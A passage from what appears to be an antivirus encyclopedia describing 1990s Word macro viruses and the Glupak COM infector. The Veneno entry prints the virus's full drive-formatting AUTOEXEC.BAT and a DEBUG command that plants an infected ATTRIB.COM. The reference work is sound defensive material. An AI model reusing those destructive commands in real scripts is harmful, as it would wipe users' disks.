  32018. "   ALERT! Autorunning macro (possibly virus) detected in document.   "
  32019. "   Press OK to disable   "
  32020.  
  32021. Variants:
  32022. None
  32023.  
  32024.  
  32025. [WORD_Demon.A]
  32026. Virus Name: WORD_Demon.A
  32027. Alias: n/a
  32028. Virus Type: Macro Virus
  32029. Platform: Word 6, Word 7
  32030. Number of Macros: 3
  32031. Encrypted: Yes
  32032. Size of Macro: 4318 Bytes in documents
  32033. Size of Virus: n/a
  32034. Size of Malicious Code: n/a
  32035. Place of Origin: n/a
  32036. Date of Origin: May, 1997
  32037. Symptoms: Displays messages, modifies WIN.INI
  32038. Destructive: No
  32039. Trigger Date: n/a
  32040. Password: n/a
  32041. Seen in the Wild: Yes
  32042.  
  32043. Description:
  32044. Demon infects the global template (normal.dot) when an
  32045. infected document is opened (AutoOpen). Further documents
  32046. become infected when they are closed (AutoClose).
  32047.  
  32048. Demon is another semi-polymorphic virus, with two macros
  32049. containing random names.
  32050.  
  32051. When selecting the text "   Dark Master calling   " in the active
  32052. document, Demon displays the following message:
  32053.  
  32054. "   WINWORD HIDDEN DEMON   "
  32055. "   is happy to see his MASTER!!!   "
  32056. "   GREAT DAY !!!   "
  32057. "   This file is infected as #    "
  32058.  
  32059. Demon also adds the following section to WIN.INI:
  32060.  
  32061. "   I   "
  32062.  
  32063. In addition, the following text can be found in the code:
  32064.  
  32065. "   REM  *** Infecting the system ***   "
  32066.  
  32067. "   REM  *** Destroing all other macro & anti-macro programms ***   "
  32068.  
  32069. Variants:
  32070. None
  32071.  
  32072.  
  32073. [WORD_Veneno]
  32074. Virus Name: WORD_Veneno
  32075. Alias: n/a
  32076. Virus Type: Macro Virus
  32077. Platform: Word 6, Word 7
  32078. Number of Macros: 12
  32079. Encrypted: Yes
  32080. Size of Macro: 23544 Bytes
  32081. Size of Virus: n/a
  32082. Size of Malicious Code: n/a
  32083. Place of Origin: Mexico
  32084. Date of Origin: December, 1996
  32085. Symptoms:
  32086. Destructive: Yes
  32087. Trigger Date: n/a
  32088. Password: Veneno
  32089. Seen in the Wild: Yes
  32090.  
  32091. Description:
  32092. Veneno is a mexican virus that is able to replicate itself
  32093. across the MS Word spanish version. It uses 12 macros to infect
  32094. and do damage. These macros include complex routines, which
  32095. execute on very special conditions. Some of them are truly dangerous
  32096. putting in risk the user information.
  32097.  
  32098. The 12 macros include:
  32099. ArchivoAbrir (FileOpen)
  32100. ArchivoGuardarComo (FileSaveAs)
  32101. ArchivoImprimir (FilePrint)
  32102. ArchivoImprimirPredeter (FilePrintPredeter)
  32103. ArchivoSalir (FileExit)
  32104. AutoExec
  32105. AutoOpen
  32106. InsertVeneno
  32107. Travel1
  32108. Travel2
  32109. Triniton
  32110. Veneno
  32111.  
  32112. (When you open documents...)
  32113.  
  32114. Veneno tries to infect the global template (NORMAL.DOT) each
  32115. time you open an infected document. This infection process
  32116. happens both, when you open documents from the File - Open menu
  32117. and when you double-click an infected file from the MS Explorer
  32118. or the File Manager.
  32119.  
  32120. The virus checks if there are some macros installed in the
  32121. NORMAL.DOT before it executes its infection routine that
  32122. deletes existing macros. The number of macros the virus removes
  32123. depends on the way you open an infected document. Here is a
  32124. list of the macros the virus removes:
  32125.  
  32126. FileOpen, AAAZAO, AAAZA0, PayLoad, autoOpen, autoopen, Autoopen,
  32127. Autoexec, autoexec, autoExec, insertpayLoad, Insertpayload,
  32128. insertPayload, payload, Payload, PAYLOAD, AUTOOPEN, ArchivoAbrir,
  32129. ArchivoGuardarComo, ArchivoImprimirPredeter, ArchivoImprimir,
  32130. ArchivoAbrir, ArchivoSalir, AutoExec, AutoOpen, AutoClose,
  32131. AutoNew and HerramMacro.
  32132.  
  32133. The virus modifies some MS Word values when you open an infected
  32134. document from the File Manager, MS Explorer or other applications
  32135. (this is when the virus executes its AutoExec macro). This macro
  32136. doesn't run when you open the file from the MS Word File menu.
  32137. The values the virus modifies are the user name (to "Veneno") and
  32138. initials (to "PirateMX").
  32139.  
  32140. After being sure any other macro will interfere with its task, the
  32141. virus checks if the NORMAL.DOT was infected previously. Veneno
  32142. searches for its own macros AutoExec, Veneno, AutoOpen, InsertVeneo,
  32143. Triniton and Travel1. If any of these macros does not exist, the
  32144. virus copies its 12 macros into NORMAL.DOT. Veneno then executes
  32145. two dangerous macros: Veneno and Triniton in that sequence.
  32146.  
  32147. The Veneno macro creates a new AUTOEXEC.BAT and CONFIG.SYS when
  32148. certain conditions are met. These conditions are: the Month field
  32149. should be below 6, the Day field should be above 26 and a random
  32150. generated number (from 1 to 30) should be 30. The new batch file
  32151. will have the hard disk formatted the next time the user turns on
  32152. his/her PC.
  32153.  
  32154. The new AUTOEXEC.BAT and CONFIG.SYS files the virus creates
  32155. contain the following:
  32156.  
  32157. AUTOEXEC.BAT:
  32158.  
  32159. @echo off
  32160. PATH=C:\;C:\DOS;C:\WINDOWS;C:\ODI;
  32161. Echo.
  32162. Echo Insert a diskette in drive A:
  32163. Echo Press any key to continue...
  32164. pause > nul
  32165. Format a: /autotest > nul
  32166. if errorlevel 0 goto End
  32167. Format d: /autotest
  32168. Format c: /autotest
  32169. Echo U r FuCkEd!
  32170. Echo.
  32171. :end
  32172. Echo Ur mommy should be very happy of having such a g00d/obedient kid... jaja..asswipe!!!
  32173.  
  32174. CONFIG.SYS:
  32175.  
  32176. SHELL=C:\DOS\COMMAND.COM /F /P
  32177. SWITCHES = /n /f
  32178.  
  32179. (When Minutes field is 30...)
  32180.  
  32181. The Triniton macro executes after the Veneno macro. This macro
  32182. saves a COM infector (GLUPAK.847.A) and a special batch program
  32183. into the hard disk of the user. The GLUPAK virus infects COM files
  32184. and runs independently.
  32185.  
  32186. Triniton leaves the GLUPAK.847.A virus in an ATTRIB.COM file in
  32187. the DOS directory. The virus executes the DEBUG command with a
  32188. special script file (JIJO.SCR) to create the new ATTRIB.COM file.
  32189. The command the virus executes is described below:
  32190.  
  32191. "debug < jijo.scr > nul"
  32192.  
  32193. Once the new ATTRIB.COM is saved in the DOS directory it will be
  32194. ready to start the infection process the next time the user
  32195. executes this command. Take note that the original ATTRIB command
  32196. is an EXE file, not a COM file. The virus takes advantage of the
  32197. DOS execution priorities in order to execute the infected
  32198. ATTRIB.COM file instead of the original ATTRIB.EXE.
  32199.  
  32200. (When Minutes field is not 30...)
  32201.  
  32202. The virus will check for other conditions in case the Minutes
  32203. field is not 30. Then it will execute its dangerous routines.
  32204. These conditions are: Day field is above 5 and Minutes field
  32205. is below 5 or a special document variable is "Z". If these
  32206. conditions are met, the virus performs the following:
  32207.  
  32208. 1) Inserts the string "** V<N<NO ** " at the bottom of all
  32209.     opened documents.
  32210. 2) Replaces "ste" with "stes".
  32211. 3) Assigns a password ("Veneno") to all opened documents.
  32212. 4) Closes all opened documents without asking the user.
  32213.  
  32214. (When you save documents...)
  32215.  
  32216. Veneno tries to infect other documents when you save them.
  32217. Basically this occurs each time the user selects the Save As...
  32218. option from the File menu in MS Word. At this moment the virus
  32219. copies its 12 macros from the NORMAL.DOT to the document the
  32220. user is saving. Then, once the NORMAL.DOT is infected, all the
  32221. documents the user saves using the Save As... option will
  32222. also be infected. Take note that the virus doesn't check if
  32223. the documents are already infected.
  32224.  
  32225. After infecting a document the virus checks for the system time.
  32226. Veneno displays a message on the screen if the Seconds field is
  32227. 38. This message reads:
  32228.  
  32229. "Khelia Monica Salda~a Diaz, me encantas y te sigo buscando...
  32230. Donde te has escondido?  Atte. Tu enamorado.  (LoVe90/91)"
  32231. "Un amigo desesperado en busca de..."
  32232.  
  32233. (When you print documents...)
  32234.  
  32235. Veneno also appears when you print documents. To do this job
  32236. the virus has two special macros called ArchivoImprimir and
  32237. ArchivoImprimirPredeter. The message reads:
  32238.  
  32239. "Finalmente me gustaria agregar que..."
  32240. "El centro de Computos de esta Universidad es una verdadera
  32241. verguenza, no nos merecemos este servicio"
  32242. ">>> Shame on you! ! ! <<<"
  32243.  
  32244. In english :
  32245.  
  32246. "Finally I would like to say that..."
  32247. "The computer center in this university is a real shame, we will
  32248. not be deserving this service "
  32249. ">>> Shame on you! ! ! <<<"
  32250.  
  32251. The virus also deletes the last lines of the document you want
  32252. to print if you click on the Print button located in the toolbar.
  32253. This routine will be executed only if the Seconds field is above
  32254. 57.
  32255.  
  32256. The macros Travel1 and Travel2 are just backups to the AutoExec
  32257. and AutoOpen macros, respectively. The macros ArchivoAbrir
  32258. (FileOpen) and ArchivoSalir (FileExit) execute some commands to
  32259. enable the automacro execution, to save changes in the NORMAL.DOT
  32260. without prompting the user and to create a backup for that.
  32261.  
  32262.  
  32263. [Glupak.847.A]
  32264. Virus Name: Glupak.847.A
  32265. Alias Name: Freaky, THU, Suicidal Dream
  32266. Virus Type: File virus (COM files, non resident)
  32267. Encrypted: Yes
  32268. Virus Size: 847 Bytes
  32269. Place of Origin: Canada
  32270. Date of Origin: 1996
  32271. Destructive: Yes
  32272. Trigger Date: October 21
  32273.  
  32274. Description:
  32275. Glupak directly infects COM files appending its viral codes.
  32276. The virus adds 434 months to the date of infected files and
  32277. deletes the ANTI-VIR.DAT file if it exists.
  32278.  
  32279. Glupak executes its dangerous routine on October 21. On this
  32280. day the virus tries to overwrite the user's hard disk. After
  32281. doing so, the virus reboots the PC and displays the following
  32282. message:
  32283.  
  32284. "Happy Birthday Freaky!"
  32285.  
  32286. The following messages are found inside the code:
  32287.  
  32288. [TV.Suicidal.Dream.B] (c) 1996 The Freak/The Underground From
  32289. the hypnotic spectre of wake I scream locked in depths of
  32290. suicidal Dream
  32291.  
  32292.  
  32293. [WORD_Childish.A]
  32294. Virus Name: WORD_Childish.A
  32295. Alias: Chill
  32296. Virus Type: Macro Virus
  32297. Platform: Word 6, Word 7
  32298. Number of Macros: 2
  32299. Encrypted: Yes
  32300. Size of Macro: 361 Bytes
  32301. Size of Virus: n/a
  32302. Size of Malicious Code: n/a
  32303. Place of Origin: n/a
  32304. Date of Origin: 1997
  32305. Symptoms: None
  32306. Destructive: No
  32307. Trigger Date: None
  32308. Password: n/a
  32309. Seen in the Wild: No
  32310.  
  32311. Description:
  32312. Childish.A infects the global template (normal.dot) when an infected
  32313. document is opened. Further documents become infected when they are
  32314. also opened (AutoOpen).
  32315.  
  32316. Childish uses ToolsMacro to make recognition of an infected document
  32317. more difficult (called macro stealth technique).
  32318.  
  32319. Childish is another do-nothing macro virus. It is only infectious.
  32320.  
  32321. Variants:
  32322. None
  32323.  
  32324.  
  32325. [WORD_Minimal.A]
  32326. Virus Name: WORD_Minimal.A
  32327. Alias: n/a
  32328. Virus Type: Macro Virus
  32329. Platform: Word 6, Word 7, Word 8
  32330. Number of Macros: 1
  32331. Encrypted: No
  32332. Size of Macro: 256 Bytes
  32333. Size of Virus: n/a
  32334. Size of Malicious Code: n/a
  32335. Place of Origin: n/a
  32336. Date of Origin: Spring, 1997
  32337. Symptoms: None
  32338. Destructive: No
  32339. Trigger Date: n/a
  32340. Password: n/a
  32341. Seen in the Wild: Yes
  32342.  
  32343. Description:
  32344. Minimal.A infects the global template (normal.dot) when an
  32345. infected document is opened (AutoOpen). Further documents
  32346. become infected when they are also opened (AutoOpen).
  32347.  
  32348. Unlike many other macro viruses, Minimal does not contain any
  32349. harmful payload. It only infects other files.
  32350.  
  32351. Minimal.A is also able to upconvert to the Word97 format and
  32352. infect Word 8.0 documents.
  32353.  
  32354. Variants:
  32355. Minimal.B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
  32356.  
  32357.  
  32358. [WORD_Minimal.B]
  32359. Virus Name: WORD_Minimal.B
  32360. Alias: n/a
  32361. Virus Type: Macro Virus
  32362. Platform: Word 6, Word 7, Word 8
  32363. Number of Macros: 1
  32364. Encrypted: No
  32365. Size of Macro: 176 Bytes
  32366. Size of Virus: n/a
  32367. Size of Malicious Code: n/a
  32368. Place of Origin: n/a
  32369. Date of Origin: Spring, 1997
  32370. Symptoms: None
  32371. Destructive: No
  32372. Trigger Date: n/a
  32373. Password: n/a
  32374. Seen in the Wild: Yes
  32375.  
  32376. Description:
  32377. The main difference between this new variant and the original
  32378. Minimal.A virus is that Minimal.B contains less macro code.
  32379.  
  32380. Minimal.B infects the global template (normal.dot) when an
  32381. infected document is opened (AutoOpen). Further documents
  32382. become infected when they are also opened (AutoOpen).
  32383.  
  32384. Unlike many other macro viruses, Minimal does not contain any
  32385. harmful payload. It only infects other files.
  32386.  
  32387. Minimal.B is also able to upconvert to the Word97 format and
  32388. infect Word 8.0 documents.
  32389.  
  32390. Variants:
  32391. Minimal.A,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
  32392.  
  32393.  
  32394. [WORD_Minimal.C]
  32395. Virus Name: WORD_Minimal.C
  32396. Alias: n/a
  32397. Virus Type: Macro Virus
  32398. Platform: Word 8
  32399. Number of Macros: 1
  32400. Encrypted: No
  32401. Size of Macro: n/a Bytes
  32402. Size of Virus: n/a
  32403. Size of Malicious Code: n/a
  32404. Place of Origin: n/a
  32405. Date of Origin: Spring, 1997
  32406. Symptoms: None
  32407. Destructive: No
  32408. Trigger Date: n/a
  32409. Password: n/a
  32410. Seen in the Wild: Yes
  32411.  
  32412. Description:
  32413. The main difference between this new variant and the original
  32414. Minimal.A virus is that Minimal.C was written for the Word 97
  32415. file format (VBA 5).
  32416.  
  32417. Minimal.C infects the global template (normal.dot) when an
  32418. infected document is opened (AutoOpen). Further documents
  32419. become infected when they are also opened (AutoOpen).
  32420.  
  32421. Unlike many other macro viruses, Minimal does not contain any
  32422. harmful payload. It only infects other files.
  32423.  
  32424. Variants:
  32425. Minimal.A,B,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
  32426.  
  32427.  
  32428. [WORD_Minimal.D]
  32429. Virus Name: WORD_Minimal.D
  32430. Alias: n/a
  32431. Virus Type: Macro Virus
  32432. Platform: Word 6, Word 7, Word 8
  32433. Number of Macros: 1
  32434. Encrypted: No
  32435. Size of Macro: 90 Bytes
  32436. Size of Virus: n/a
  32437. Size of Malicious Code: n/a
  32438. Place of Origin: n/a
  32439. Date of Origin: Spring, 1997
  32440. Symptoms: None
  32441. Destructive: No
  32442. Trigger Date: n/a
  32443. Password: n/a
  32444. Seen in the Wild: Yes
  32445.  
  32446. Description:
  32447. The main difference between this new variant and previous
  32448. Minimal viruses is that Minimal.D contains minor code changes.
  32449.  
  32450. Minimal.D infects the global template (normal.dot) when an
  32451. infected document is opened (AutoOpen). Further documents
  32452. become infected when they are also opened (AutoOpen).
  32453.  
  32454. Unlike many other macro viruses, Minimal does not contain any
  32455. harmful payload. It only infects other files.
  32456.  
  32457. Minimal.D is also able to upconvert to the Word97 format and
  32458. infect Word 8.0 documents.
  32459.  
  32460. Variants:
  32461. Minimal.A,B,C,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
  32462.  
  32463.  
  32464. [WORD_Minimal.E]
  32465. Virus Name: WORD_Minimal.E
  32466. Alias: n/a
  32467. Virus Type: Macro Virus
  32468. Platform: Word 6, Word 7
  32469. Number of Macros: 1
  32470. Encrypted: Yes
  32471. Size of Macro: 132 Bytes
  32472. Size of Virus: n/a
  32473. Size of Malicious Code: n/a
  32474. Place of Origin: n/a
  32475. Date of Origin: Spring, 1997
  32476. Symptoms: None
  32477. Destructive: No
  32478. Trigger Date: n/a
  32479. Password: n/a
  32480. Seen in the Wild: No
  32481.  
  32482. Description:
  32483. The main difference between this new variant and previous
  32484. Minimal viruses is that Minimal.E is encrypted (read-only).
  32485.  
  32486. Minimal.E infects the global template (normal.dot) when an
  32487. infected document is opened (AutoOpen). Further documents
  32488. become infected when they are also opened (AutoOpen).
  32489.  
  32490. Unlike many other macro viruses, Minimal does not contain any
  32491. harmful payload. It only infects other files.
  32492.  
  32493. Variants:
  32494. Minimal.A,B,C,D,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
  32495.  
  32496.  
  32497. [WORD_Minimal.F]
  32498. Virus Name: WORD_Minimal.F
  32499. Alias: n/a
  32500. Virus Type: Macro Virus
  32501. Platform: Word 6, Word 7
  32502. Number of Macros: 1
  32503. Encrypted: No
  32504. Size of Macro: n/a Bytes
  32505. Size of Virus: n/a
  32506. Size of Malicious Code: n/a
  32507. Place of Origin: n/a
  32508. Date of Origin: Spring, 1997
  32509. Symptoms: None
  32510. Destructive: No
  32511. Trigger Date: n/a
  32512. Password: n/a
  32513. Seen in the Wild: No
  32514.  
  32515. Description:
  32516. The main difference between this new variant and previous
  32517. Minimal viruses is that Minimal.F contains minor code changes.
  32518.  
  32519. Minimal.F infects the global template (normal.dot) when an
  32520. infected document is opened (AutoOpen). Further documents
  32521. become infected when they are also opened (AutoOpen).
  32522.  
  32523. Unlike many other macro viruses, Minimal does not contain any
  32524. harmful payload. It only infects other files.
  32525.  
  32526. Variants:
  32527. Minimal.A,B,C,D,E,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
  32528.  
  32529.  
  32530. [WORD_Minimal.G]
  32531. Virus Name: WORD_Minimal.G
  32532. Alias: n/a
  32533. Virus Type: Macro Virus
  32534. Platform: Word 6, Word 7
  32535. Number of Macros: 1
  32536. Encrypted: No
  32537. Size of Macro: 206 Bytes
  32538. Size of Virus: n/a
  32539. Size of Malicious Code: n/a
  32540. Place of Origin: n/a
  32541. Date of Origin: Spring, 1997
  32542. Symptoms: None
  32543. Destructive: No
  32544. Trigger Date: n/a
  32545. Password: n/a
  32546. Seen in the Wild: No
  32547.  
  32548. Description:
  32549. The main difference between this new variant and previous
  32550. Minimal viruses is that Minimal.G contains minor code changes.
  32551.  
  32552. Minimal.G infects the global template (normal.dot) when an
  32553. infected document is opened (AutoOpen). Further documents
  32554. become infected when they are also opened (AutoOpen).
  32555.  
  32556. Unlike many other macro viruses, Minimal does not contain any
  32557. harmful payload. It only infects other files.
  32558.  
  32559. Variants:
  32560. Minimal.A,B,C,D,E,F,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
  32561.  
  32562.  
  32563. [WORD_Minimal.H]
  32564. Virus Name: WORD_Minimal.H
  32565. Alias: n/a
  32566. Virus Type: Macro Virus
  32567. Platform: Word 6, Word 7
  32568. Number of Macros: 1
  32569. Encrypted: No
  32570. Size of Macro: 217 Bytes
  32571. Size of Virus: n/a
  32572. Size of Malicious Code: n/a
  32573. Place of Origin: n/a
  32574. Date of Origin: Spring, 1997
  32575. Symptoms: None
  32576. Destructive: No
  32577. Trigger Date: n/a
  32578. Password: n/a
  32579. Seen in the Wild: No
  32580.  
  32581. Description:
  32582. The main difference between this new variant and previous
  32583. Minimal viruses is that Minimal.H contains minor code changes.
  32584.  
  32585. Minimal.H infects the global template (normal.dot) when an
  32586. infected document is opened (AutoOpen). Further documents
  32587. become infected when they are also opened (AutoOpen).
  32588.  
  32589. Unlike many other macro viruses, Minimal does not contain any
  32590. harmful payload. It only infects other files.
  32591.  
  32592. Variants:
  32593. Minimal.A,B,C,D,E,F,G,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
  32594.  
  32595.  
  32596. [WORD_Minimal.I]
  32597. Virus Name: WORD_Minimal.I
  32598. Alias: n/a
  32599. Virus Type: Macro Virus
  32600. Platform: Word 6, Word 7
  32601. Number of Macros: 1
  32602. Encrypted: No
  32603. Size of Macro: 242 Bytes
  32604. Size of Virus: n/a
  32605. Size of Malicious Code: n/a
  32606. Place of Origin: n/a
  32607. Date of Origin: Spring, 1997
  32608. Symptoms: None
  32609. Destructive: No
  32610. Trigger Date: n/a
  32611. Password: n/a
  32612. Seen in the Wild: No
  32613.  
  32614. Description:
  32615. The main difference between this new variant and previous
  32616. Minimal viruses is that Minimal.I contains minor code changes.
  32617.  
  32618. Minimal.I infects the global template (normal.dot) when an
  32619. infected document is opened (AutoOpen). Further documents
  32620. become infected when they are also opened (AutoOpen).
  32621.  
  32622. Unlike many other macro viruses, Minimal does not contain any
  32623. harmful payload. It only infects other files.
  32624.  
  32625. Variants:
  32626. Minimal.A,B,C,D,E,F,G,H,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
  32627.  
  32628.  
  32629. [WORD_Minimal.J]
  32630. Virus Name: WORD_Minimal.J
  32631. Alias: n/a
  32632. Virus Type: Macro Virus
  32633. Platform: Word 6, Word 7
  32634. Number of Macros: 1
  32635. Encrypted: No
  32636. Size of Macro: 91 Bytes
  32637. Size of Virus: n/a
  32638. Size of Malicious Code: n/a
  32639. Place of Origin: n/a
  32640. Date of Origin: Spring, 1997
  32641. Symptoms: None
  32642. Destructive: No
  32643. Trigger Date: n/a
  32644. Password: n/a
  32645. Seen in the Wild: No
  32646.  
  32647. Description:
  32648. The main difference between this new variant and previous
  32649. Minimal viruses is that Minimal.J contains minor code changes.
  32650.  
  32651. Minimal.J infects the global template (normal.dot) when an
  32652. infected document is opened (AutoOpen). Further documents
  32653. become infected when they are also opened (AutoOpen).
  32654.  
  32655. Unlike many other macro viruses, Minimal does not contain any
  32656. harmful payload. It only infects other files.
  32657.  
  32658. Variants:
  32659. Minimal.A,B,C,D,E,F,G,H,I,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
  32660.  
  32661.  
  32662. [WORD_Minimal.K]
  32663. Virus Name: WORD_Minimal.K
  32664. Alias: n/a
  32665. Virus Type: Macro Virus
  32666. Platform: Word 6, Word 7
  32667. Number of Macros: 1
  32668. Encrypted: No
  32669. Size of Macro: 259 Bytes
  32670. Size of Virus: n/a
  32671. Size of Malicious Code: n/a
  32672. Place of Origin: n/a
  32673. Date of Origin: Spring, 1997
  32674. Symptoms: None
  32675. Destructive: No
  32676. Trigger Date: n/a
  32677. Password: n/a
  32678. Seen in the Wild: No
  32679.  
  32680. Description:
  32681. The main difference between this new variant and previous
  32682. Minimal viruses is that Minimal.K contains minor code changes.
  32683.  
  32684. Minimal.K infects the global template (normal.dot) when an
  32685. infected document is opened (AutoOpen). Further documents
  32686. become infected when they are also opened (AutoOpen).
  32687.  
  32688. Unlike many other macro viruses, Minimal does not contain any
  32689. harmful payload. It only infects other files.
  32690.  
  32691. Variants:
  32692. Minimal.A,B,C,D,E,F,G,H,I,J,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
  32693.  
  32694.  
  32695. [WORD_Minimal.L]
  32696. Virus Name: WORD_Minimal.L
  32697. Alias: n/a
  32698. Virus Type: Macro Virus
  32699. Platform: Word 6, Word 7
  32700. Number of Macros: 1
  32701. Encrypted: No
  32702. Size of Macro: 275 Bytes
  32703. Size of Virus: n/a
  32704. Size of Malicious Code: n/a
  32705. Place of Origin: n/a
  32706. Date of Origin: Spring, 1997
  32707. Symptoms: None
  32708. Destructive: No
  32709. Trigger Date: n/a
  32710. Password: n/a
  32711. Seen in the Wild: No
  32712.  
  32713. Description:
  32714. The main difference between this new variant and previous
  32715. Minimal viruses is that Minimal.L contains minor code changes.
  32716.  
  32717. Minimal.L infects the global template (normal.dot) when an
  32718. infected document is opened (AutoOpen). Further documents
  32719. become infected when they are also opened (AutoOpen).
  32720.  
  32721. Unlike many other macro viruses, Minimal does not contain any
  32722. harmful payload. It only infects other files.
  32723.  
  32724. Variants:
  32725. Minimal.A,B,C,D,E,F,G,H,I,J,K,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
  32726.  
  32727.  
  32728. [WORD_Minimal.M]
  32729. Virus Name: WORD_Minimal.M
  32730. Alias: n/a
  32731. Virus Type: Macro Virus
  32732. Platform: Word 6, Word 7
  32733. Number of Macros: 1
  32734. Encrypted: No
  32735. Size of Macro: 270 Bytes
  32736. Size of Virus: n/a
  32737. Size of Malicious Code: n/a
  32738. Place of Origin: n/a
  32739. Date of Origin: Spring, 1997
  32740. Symptoms: None
  32741. Destructive: No
  32742. Trigger Date: n/a
  32743. Password: n/a
  32744. Seen in the Wild: No
  32745.  
  32746. Description:
  32747. The main difference between this new variant and previous
  32748. Minimal viruses is that Minimal.M contains minor code changes.
  32749.  
  32750. Minimal.M infects the global template (normal.dot) when an
  32751. infected document is opened (AutoOpen). Further documents
  32752. become infected when they are also opened (AutoOpen).
  32753.  
  32754. Unlike many other macro viruses, Minimal does not contain any
  32755. harmful payload. It only infects other files.
  32756.  
  32757. Variants:
  32758. Minimal.A,B,C,D,E,F,G,H,I,J,K,L,N,O,P,Q,R,S,T,U,V,W,X,Y,Z
  32759.  
  32760.  
  32761. [WORD_Minimal.N]
  32762. Virus Name: WORD_Minimal.N
  32763. Alias: n/a
  32764. Virus Type: Macro Virus
  32765. Platform: Word 6, Word 7
  32766. Number of Macros: 1
  32767. Encrypted: No
  32768. Size of Macro: 206 Bytes
  32769. Size of Virus: n/a
  32770. Size of Malicious Code: n/a
  32771. Place of Origin: n/a
  32772. Date of Origin: Spring, 1997
  32773. Symptoms: None
  32774. Destructive: No
  32775. Trigger Date: n/a
  32776. Password: n/a
  32777. Seen in the Wild: No
  32778.  
  32779. Description:
  32780. The main difference between this new variant and previous
  32781. Minimal viruses is that Minimal.N contains minor code changes.
  32782.  
  32783. Minimal.N infects the global template (normal.dot) when an
  32784. infected document is opened (AutoOpen). Further documents
  32785. become infected when they are also opened (AutoOpen).
  32786.  
  32787. Unlike many other macro viruses, Minimal does not contain any
  32788. harmful payload. It only infects other files.
  32789.  
  32790. Variants:
  32791. Minimal.A,B,C,D,E,F,G,H,I,J,K,L,M,